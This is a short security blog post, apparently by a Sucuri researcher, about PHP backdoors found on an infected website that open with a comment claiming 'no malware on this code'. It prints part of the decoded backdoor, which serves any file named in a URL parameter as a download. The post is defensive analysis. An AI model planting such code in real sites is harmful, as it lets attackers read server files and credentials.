Backdoor: No malware on this code, you can check it by yourself

We were cleaning up an infected web site a few days ago and it had multiple backdoors. They all started like that:

// no malware on this code, you can check it by yourself ; – )

We see this very often, where malware authors put valid headers and messages to try to disguise what it does, but never in such a direct way. I guess it just made the job easier for us…

You can see the full backdoor here:

As far as what the code does, it decodes to a backdoor:

if(isset($_GET[‘dl’]) && ($_GET[‘dl’] != “”)){ $file = $_GET[‘dl’]; $filez = @file_get_contents($file); header(“Content-type: application/octet-stream”); header(“Content-length: “.strlen($filez)); header(“Content-disposition: attachment; filename=””.basename($file).””;”); echo $filez; exit; } elseif(isset($_GET[‘dlgzip’]) && ($_GET[‘dlgzip’] != “”)){ $file = $_GET[‘dlgzip’];…

To avoid getting your site blacklisted or with malware, visit to learn about our site security monitoring and malware removal solutions.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.